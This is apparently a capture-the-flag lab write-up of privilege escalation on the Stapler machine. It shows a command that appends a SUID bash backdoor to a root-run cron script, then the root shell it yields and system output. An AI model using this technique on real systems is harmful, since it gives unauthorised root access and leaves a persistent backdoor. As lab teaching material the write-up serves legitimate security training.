Writable Root Cronjob
A writable Bash script is being executed by the root cronjob process.
SHayslett@red:/dev/shm$ echo 'cp /bin/bash /tmp/r00t ; chmod +s /tmp/r00t' >> /usr/local/sbin/cron-logrotate.sh Creating a SUID Bash backdoor
/Play/Stapler/5-Privilege_Escalation/attachments/{BC19057C-C2A2-4790-A164-557588CE3107}.png)
The root cronjob process just executed the Bash script
SHayslett@red:/dev/shm$ ll /tmp/r00t
-rwsr-sr-x 1 root root 1109520 Apr 29 00:05 /tmp/r00t*There it is
SHayslett@red:/dev/shm$ /tmp/r00t -p
r00t-4.3# whoami
root
r00t-4.3# hostname
red.initech
r00t-4.3# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:5d:3c brd ff:ff:ff:ff:ff:ff
inet 192.168.239.148/24 brd 192.168.239.255 scope global ens192
valid_lft forever preferred_lft foreverSystem level compromise